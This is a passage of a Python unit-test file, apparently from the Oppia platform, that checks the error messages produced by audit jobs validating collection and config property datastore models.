'CollectionRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_collection_version_in_model_id(self):
model_with_invalid_version_in_id = (
collection_models.CollectionRightsSnapshotMetadataModel(
id='0-3', committer_id=self.owner_id, commit_type='edit',
commit_message='msg', commit_cmds=[{}]))
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for collection rights model '
'version check of CollectionRightsSnapshotMetadataModel\', '
'[u\'Entity id 0-3: CollectionRights model corresponding to '
'id 0 has a version 1 which is less than the version 3 in '
'snapshot metadata model id\']]'
), (
u'[u\'fully-validated '
'CollectionRightsSnapshotMetadataModel\', 3]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_cmd_schmea(self):
self.model_instance_0.commit_cmds = [{
'cmd': 'change_collection_status',
'old_status': rights_manager.ACTIVITY_STATUS_PUBLIC,
}, {
'cmd': 'release_ownership',
'invalid_attribute': 'invalid'
}]
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit cmd '
'change_collection_status check of '
'CollectionRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation for '
'command: {u\'old_status\': u\'public\', '
'u\'cmd\': u\'change_collection_status\'} failed with error: '
'The following required attributes are missing: '
'new_status"]]'
), (
u'[u\'failed validation check for commit cmd '
'release_ownership check of '
'CollectionRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'release_ownership\', '
'u\'invalid_attribute\': u\'invalid\'} failed with error: '
'The following extra attributes are present: '
'invalid_attribute"]]'
), (
u'[u\'fully-validated '
'CollectionRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
class CollectionRightsSnapshotContentModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(CollectionRightsSnapshotContentModelValidatorTests, self).setUp(
)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
collections = [collection_domain.Collection.create_default_collection(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
objective='objective%d' % i,
) for i in xrange(3)]
for index, collection in enumerate(collections):
collection.add_node('%s' % (index * 2))
collection.add_node('%s' % (index * 2 + 1))
collection_services.save_new_collection(self.owner_id, collection)
self.model_instance_0 = (
collection_models.CollectionRightsSnapshotContentModel.get_by_id(
'0-1'))
self.model_instance_1 = (
collection_models.CollectionRightsSnapshotContentModel.get_by_id(
'1-1'))
self.model_instance_2 = (
collection_models.CollectionRightsSnapshotContentModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.CollectionRightsSnapshotContentModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated CollectionRightsSnapshotContentModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of CollectionRightsSnapshotContentModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'CollectionRightsSnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'CollectionRightsSnapshotContentModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_collection_model_failure(self):
collection_models.CollectionRightsModel.get_by_id('0').delete(
self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for collection_rights_ids '
'field check of CollectionRightsSnapshotContentModel\', '
'[u"Entity id 0-1: based on field collection_rights_ids '
'having value 0, expect model CollectionRightsModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'collection_rights_ids having value 0, expect model '
'CollectionRightsModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'CollectionRightsSnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_collection_version_in_model_id(self):
model_with_invalid_version_in_id = (
collection_models.CollectionRightsSnapshotContentModel(
id='0-3'))
model_with_invalid_version_in_id.content = {}
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for collection rights model '
'version check of CollectionRightsSnapshotContentModel\', '
'[u\'Entity id 0-3: CollectionRights model corresponding to '
'id 0 has a version 1 which is less than the version 3 in '
'snapshot content model id\']]'
), (
u'[u\'fully-validated CollectionRightsSnapshotContentModel\', '
'3]')]
run_job_and_check_output(self, expected_output, sort=True)
class CollectionCommitLogEntryModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(CollectionCommitLogEntryModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
collections = [collection_domain.Collection.create_default_collection(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
objective='objective%d' % i,
) for i in xrange(3)]
for index, collection in enumerate(collections):
collection.add_node('%s' % (index * 2))
collection.add_node('%s' % (index * 2 + 1))
collection_services.save_new_collection(self.owner_id, collection)
self.rights_model_instance = (
collection_models.CollectionCommitLogEntryModel(
id='rights-1-1', user_id=self.owner_id,
username=self.OWNER_USERNAME, collection_id='1',
commit_type='edit', commit_message='', commit_cmds=[],
post_commit_status=constants.ACTIVITY_STATUS_PUBLIC,
post_commit_community_owned=False,
post_commit_is_private=False))
self.rights_model_instance.put()
self.model_instance_0 = (
collection_models.CollectionCommitLogEntryModel.get_by_id(
'collection-0-1'))
self.model_instance_1 = (
collection_models.CollectionCommitLogEntryModel.get_by_id(
'collection-1-1'))
self.model_instance_2 = (
collection_models.CollectionCommitLogEntryModel.get_by_id(
'collection-2-1'))
self.job_class = (
prod_validation_jobs_one_off
.CollectionCommitLogEntryModelAuditOneOffJob)
def test_standard_operation(self):
collection_services.update_collection(
self.owner_id, '0', [{
'cmd': 'edit_collection_property',
'property_name': 'title',
'new_value': 'New title'
}], 'Changes.')
expected_output = [
u'[u\'fully-validated CollectionCommitLogEntryModel\', 5]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of CollectionCommitLogEntryModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
self.rights_model_instance.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'CollectionCommitLogEntryModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_collection_model_failure(self):
collection_models.CollectionModel.get_by_id('0').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for collection_ids '
'field check of CollectionCommitLogEntryModel\', '
'[u"Entity id collection-0-1: based on field collection_ids '
'having value 0, expect model CollectionModel with id 0 '
'but it doesn\'t exist", u"Entity id collection-0-2: based '
'on field collection_ids having value 0, expect model '
'CollectionModel with id 0 but it doesn\'t exist"]]'
), u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
run_job_and_check_output(
self, expected_output, literal_eval=True)
def test_missing_collection_rights_model_failure(self):
collection_models.CollectionRightsModel.get_by_id('1').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for collection_rights_ids '
'field check of CollectionCommitLogEntryModel\', '
'[u"Entity id rights-1-1: based on field '
'collection_rights_ids having value 1, expect model '
'CollectionRightsModel with id 1 but it doesn\'t exist"]]'
), u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
run_job_and_check_output(
self, expected_output, sort=True)
def test_invalid_collection_version_in_model_id(self):
model_with_invalid_version_in_id = (
collection_models.CollectionCommitLogEntryModel.create(
'0', 3, self.owner_id, self.OWNER_USERNAME, 'edit',
'msg', [{}],
constants.ACTIVITY_STATUS_PUBLIC, False))
model_with_invalid_version_in_id.collection_id = '0'
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for collection model '
'version check of CollectionCommitLogEntryModel\', '
'[u\'Entity id %s: Collection model corresponding '
'to id 0 has a version 1 which is less than '
'the version 3 in commit log entry model id\']]'
) % (model_with_invalid_version_in_id.id),
u'[u\'fully-validated CollectionCommitLogEntryModel\', 4]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_id(self):
model_with_invalid_id = (
collection_models.CollectionCommitLogEntryModel(
id='invalid-0-1', user_id=self.owner_id,
username=self.OWNER_USERNAME, commit_type='edit',
commit_message='msg', commit_cmds=[{}],
post_commit_status=constants.ACTIVITY_STATUS_PUBLIC,
post_commit_is_private=False))
model_with_invalid_id.collection_id = '0'
model_with_invalid_id.put()
expected_output = [
(
u'[u\'failed validation check for model id check of '
'CollectionCommitLogEntryModel\', '
'[u\'Entity id %s: Entity id does not match regex pattern\']]'
) % (model_with_invalid_id.id), (
u'[u\'failed validation check for commit cmd check of '
'CollectionCommitLogEntryModel\', [u\'Entity id invalid-0-1: '
'No commit command domain object defined for entity with '
'commands: [{}]\']]'),
u'[u\'fully-validated CollectionCommitLogEntryModel\', 4]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_type(self):
self.model_instance_0.commit_type = 'invalid'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit type check of '
'CollectionCommitLogEntryModel\', '
'[u\'Entity id collection-0-1: Commit type invalid is '
'not allowed\']]'
), u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_post_commit_status(self):
self.model_instance_0.post_commit_status = 'invalid'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for post commit status check '
'of CollectionCommitLogEntryModel\', '
'[u\'Entity id collection-0-1: Post commit status invalid '
'is invalid\']]'
), u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_true_post_commit_is_private(self):
self.model_instance_0.post_commit_status = (
feconf.POST_COMMIT_STATUS_PUBLIC)
self.model_instance_0.post_commit_is_private = True
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for post commit is private '
'check of CollectionCommitLogEntryModel\', '
'[u\'Entity id %s: Post commit status is '
'%s but post_commit_is_private is True\']]'
) % (self.model_instance_0.id, feconf.POST_COMMIT_STATUS_PUBLIC),
u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_false_post_commit_is_private(self):
self.model_instance_0.post_commit_status = (
feconf.POST_COMMIT_STATUS_PRIVATE)
self.model_instance_0.post_commit_is_private = False
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for post commit is private '
'check of CollectionCommitLogEntryModel\', '
'[u\'Entity id %s: Post commit status is '
'%s but post_commit_is_private is False\']]'
) % (self.model_instance_0.id, feconf.POST_COMMIT_STATUS_PRIVATE),
u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_cmd_schmea(self):
self.model_instance_0.commit_cmds = [{
'cmd': 'add_collection_node'
}, {
'cmd': 'delete_collection_node',
'invalid_attribute': 'invalid'
}]
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit cmd '
'delete_collection_node check of '
'CollectionCommitLogEntryModel\', '
'[u"Entity id collection-0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'delete_collection_node\', '
'u\'invalid_attribute\': u\'invalid\'} failed with error: '
'The following required attributes are missing: '
'exploration_id, The following extra attributes '
'are present: invalid_attribute"]]'
), (
u'[u\'failed validation check for commit cmd '
'add_collection_node check of CollectionCommitLogEntryModel\', '
'[u"Entity id collection-0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'add_collection_node\'} '
'failed with error: The following required attributes '
'are missing: exploration_id"]]'),
u'[u\'fully-validated CollectionCommitLogEntryModel\', 3]']
run_job_and_check_output(self, expected_output, sort=True)
class CollectionSummaryModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(CollectionSummaryModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.owner = user_services.UserActionsInfo(self.owner_id)
editor_email = 'user@editor.com'
viewer_email = 'user@viewer.com'
contributor_email = 'user@contributor.com'
self.signup(editor_email, 'editor')
self.signup(viewer_email, 'viewer')
self.signup(contributor_email, 'contributor')
self.editor_id = self.get_user_id_from_email(editor_email)
self.viewer_id = self.get_user_id_from_email(viewer_email)
self.contributor_id = self.get_user_id_from_email(contributor_email)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
language_codes = ['ar', 'en', 'en']
collections = [collection_domain.Collection.create_default_collection(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
objective='objective%d' % i,
language_code=language_codes[i]
) for i in xrange(3)]
for index, collection in enumerate(collections):
collection.add_node('%s' % (index * 2))
collection.add_node('%s' % (index * 2 + 1))
collection.tags = ['math', 'art']
collection_services.save_new_collection(self.owner_id, collection)
rights_manager.assign_role_for_collection(
self.owner, '0', self.editor_id, rights_manager.ROLE_EDITOR)
collection_services.update_collection(
self.contributor_id, '0', [{
'cmd': 'edit_collection_property',
'property_name': 'title',
'new_value': 'New title'
}], 'Changes.')
rights_manager.assign_role_for_collection(
self.owner, '2', self.viewer_id, rights_manager.ROLE_VIEWER)
self.model_instance_0 = (
collection_models.CollectionSummaryModel.get_by_id('0'))
self.model_instance_0.put()
self.model_instance_1 = (
collection_models.CollectionSummaryModel.get_by_id('1'))
self.model_instance_2 = (
collection_models.CollectionSummaryModel.get_by_id('2'))
self.job_class = (
prod_validation_jobs_one_off.CollectionSummaryModelAuditOneOffJob)
def test_standard_operation(self):
rights_manager.publish_collection(self.owner, '0')
collection_services.update_collection(
self.owner_id, '1', [{
'cmd': 'edit_collection_property',
'property_name': 'title',
'new_value': 'New title'
}], 'Changes.')
expected_output = [
u'[u\'fully-validated CollectionSummaryModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of CollectionSummaryModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
collection_services.delete_collection(self.owner_id, '1')
collection_services.delete_collection(self.owner_id, '2')
expected_output = [(
u'[u\'failed validation check for current time check of '
'CollectionSummaryModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_collection_model_failure(self):
collection_model = collection_models.CollectionModel.get_by_id('0')
collection_model.delete(feconf.SYSTEM_COMMITTER_ID, '', [])
self.model_instance_0.collection_model_last_updated = (
collection_model.last_updated)
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for collection_ids '
'field check of CollectionSummaryModel\', '
'[u"Entity id 0: based on field collection_ids having '
'value 0, expect model CollectionModel with id 0 but '
'it doesn\'t exist"]]'),
u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_owner_user_model_failure(self):
rights_manager.assign_role_for_collection(
self.owner, '0', self.user_id, rights_manager.ROLE_OWNER)
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for owner_user_ids '
'field check of CollectionSummaryModel\', '
'[u"Entity id 0: based on field owner_user_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]') % (self.user_id, self.user_id),
u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_editor_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.editor_id).delete()
expected_output = [
(
u'[u\'failed validation check for editor_user_ids '
'field check of CollectionSummaryModel\', '
'[u"Entity id 0: based on field editor_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.editor_id, self.editor_id),
u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_viewer_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.viewer_id).delete()
expected_output = [
(
u'[u\'failed validation check for viewer_user_ids '
'field check of CollectionSummaryModel\', '
'[u"Entity id 2: based on field viewer_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.viewer_id, self.viewer_id),
u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_contributor_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.contributor_id).delete()
expected_output = [
(
u'[u\'failed validation check for contributor_user_ids '
'field check of CollectionSummaryModel\', '
'[u"Entity id 0: based on field contributor_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.contributor_id, self.contributor_id),
u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_contributors_summary(self):
sorted_contributor_ids = sorted(
self.model_instance_0.contributors_summary.keys())
self.model_instance_0.contributors_summary = {'invalid': 1}
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for contributors summary '
'check of CollectionSummaryModel\', '
'[u"Entity id 0: Contributor ids: [u\'%s\', u\'%s\'] do '
'not match the contributor ids obtained using '
'contributors summary: [u\'invalid\']"]]'
) % (sorted_contributor_ids[0], sorted_contributor_ids[1]),
u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_node_count(self):
self.model_instance_0.node_count = 10
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for node count check '
'of CollectionSummaryModel\', '
'[u"Entity id 0: Node count: 10 does not match the number '
'of nodes in collection_contents dict: [{u\'exploration_id\': '
'u\'0\'}, {u\'exploration_id\': u\'1\'}]"]]'
), u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_ratings(self):
self.model_instance_0.ratings = {'1': 0, '2': 1}
self.model_instance_0.put()
self.model_instance_1.ratings = {}
self.model_instance_1.put()
expected_output = [(
u'[u\'failed validation check for ratings check of '
'CollectionSummaryModel\', '
'[u"Entity id 0: Expected ratings for the entity to be empty '
'but received {u\'1\': 0, u\'2\': 1}"]]'
), u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_collection_related_property(self):
self.model_instance_0.title = 'invalid'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for title field check of '
'CollectionSummaryModel\', '
'[u\'Entity id %s: title field in entity: invalid does not '
'match corresponding collection title field: New title\']]'
) % self.model_instance_0.id,
u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_collection_rights_related_property(self):
self.model_instance_0.status = 'public'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for status field check of '
'CollectionSummaryModel\', '
'[u\'Entity id %s: status field in entity: public does not '
'match corresponding collection rights status field: '
'private\']]'
) % self.model_instance_0.id,
u'[u\'fully-validated CollectionSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class ConfigPropertyModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(ConfigPropertyModelValidatorTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.model_instance = config_models.ConfigPropertyModel(
id='config_model', value='c')
self.model_instance.commit(feconf.SYSTEM_COMMITTER_ID, [])
self.csrf_model_instance = config_models.ConfigPropertyModel.get_by_id(
'oppia_csrf_secret')
self.job_class = (
prod_validation_jobs_one_off.ConfigPropertyModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated ConfigPropertyModel\', 2]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance.created_on = (
self.model_instance.last_updated + datetime.timedelta(days=1))
self.model_instance.commit(self.admin_id, [])
expected_output = [
(
u'[u\'failed validation check for time field relation check '
'of ConfigPropertyModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance.id,
self.model_instance.created_on,
self.model_instance.last_updated
),
u'[u\'fully-validated ConfigPropertyModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.csrf_model_instance.delete(self.admin_id, '', [{}])
expected_output = [(
u'[u\'failed validation check for current time check of '
'ConfigPropertyModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance.id, self.model_instance.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_metadata_model_failure(self):
config_models.ConfigPropertySnapshotMetadataModel.get_by_id(
'config_model-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_metadata_ids '
'field check of ConfigPropertyModel\', '
'[u"Entity id config_model: based on field '
'snapshot_metadata_ids having '
'value config_model-1, expect model '
'ConfigPropertySnapshotMetadataModel '
'with id config_model-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated ConfigPropertyModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_content_model_failure(self):
config_models.ConfigPropertySnapshotContentModel.get_by_id(
'config_model-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_content_ids '
'field check of ConfigPropertyModel\', '
'[u"Entity id config_model: based on field '
'snapshot_content_ids having '
'value config_model-1, expect model '
'ConfigPropertySnapshotContentModel '
'with id config_model-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated ConfigPropertyModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
class ConfigPropertySnapshotMetadataModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(ConfigPropertySnapshotMetadataModelValidatorTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.config_model = config_models.ConfigPropertyModel(
id='config_model', value='c')
self.config_model.commit(self.admin_id, [])
user_models.UserSettingsModel(
id=feconf.SYSTEM_COMMITTER_ID, email='system@committer.com').put()
self.model_instance = (
config_models.ConfigPropertySnapshotMetadataModel.get_by_id(
'config_model-1'))
self.csrf_model_instance = (
config_models.ConfigPropertySnapshotMetadataModel.get_by_id(
'oppia_csrf_secret-1'))
self.job_class = (
prod_validation_jobs_one_off
.ConfigPropertySnapshotMetadataModelAuditOneOffJob)
def test_standard_operation(self):
self.config_model.commit(self.admin_id, [])
expected_output = [
u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance.created_on = (
self.model_instance.last_updated + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [
(
u'[u\'failed validation check for time field relation check '
'of ConfigPropertySnapshotMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance.id,
self.model_instance.created_on,
self.model_instance.last_updated),
u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.csrf_model_instance.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'ConfigPropertySnapshotMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance.id, self.model_instance.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_config_property_model_failure(self):
self.config_model.delete(self.admin_id, '', [])
expected_output = [
(
u'[u\'failed validation check for config_property_ids '
'field check of ConfigPropertySnapshotMetadataModel\', '
'[u"Entity id config_model-1: based on field '
'config_property_ids having value config_model, '
'expect model ConfigPropertyModel with '
'id config_model but it doesn\'t exist", '
'u"Entity id config_model-2: based on field '
'config_property_ids having value config_model, expect model '
'ConfigPropertyModel with id config_model but it doesn\'t '
'exist"]]'
),
u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 1]']
run_job_and_check_output(self, expected_output, literal_eval=True)
def test_missing_committer_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.admin_id).delete()
expected_output = [
(
u'[u\'failed validation check for committer_ids field '
'check of ConfigPropertySnapshotMetadataModel\', '
'[u"Entity id config_model-1: based on field committer_ids '
'having value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]'
) % (self.admin_id, self.admin_id),
u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_config_property_model_version_in_model_id(self):
model_with_invalid_version_in_id = (
config_models.ConfigPropertySnapshotMetadataModel(
id='config_model-3', committer_id=self.admin_id,
commit_type='edit',
commit_message='msg', commit_cmds=[{}]))
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for config property model '
'version check of ConfigPropertySnapshotMetadataModel\', '
'[u\'Entity id config_model-3: ConfigProperty model '
'corresponding to id config_model has a version 1 '
'which is less than the version 3 in '
'snapshot metadata model id\']]'
),
u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_cmd_schmea(self):
self.model_instance.commit_cmds = [{
'cmd': 'change_property_value',
'invalid_attribute': 'invalid'
}]
self.model_instance.put()
expected_output = [
(
u'[u\'failed validation check for commit cmd '
'change_property_value check of '
'ConfigPropertySnapshotMetadataModel\', '
'[u"Entity id config_model-1: Commit command domain '
'validation for command: {u\'cmd\': '
'u\'change_property_value\', '
'u\'invalid_attribute\': u\'invalid\'} failed with error: '
'The following required attributes are missing: '
'new_value, The following extra attributes are present: '
'invalid_attribute"]]'
), u'[u\'fully-validated ConfigPropertySnapshotMetadataModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
class ConfigPropertySnapshotContentModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(ConfigPropertySnapshotContentModelValidatorTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.config_model = config_models.ConfigPropertyModel(
id='config_model', value='c')
self.config_model.commit(self.admin_id, [])
user_models.UserSettingsModel(
id=feconf.SYSTEM_COMMITTER_ID, email='system@committer.com').put()
self.model_instance = (
config_models.ConfigPropertySnapshotContentModel.get_by_id(
'config_model-1'))
self.csrf_model_instance = (
config_models.ConfigPropertySnapshotContentModel.get_by_id(
'oppia_csrf_secret-1'))
self.job_class = (
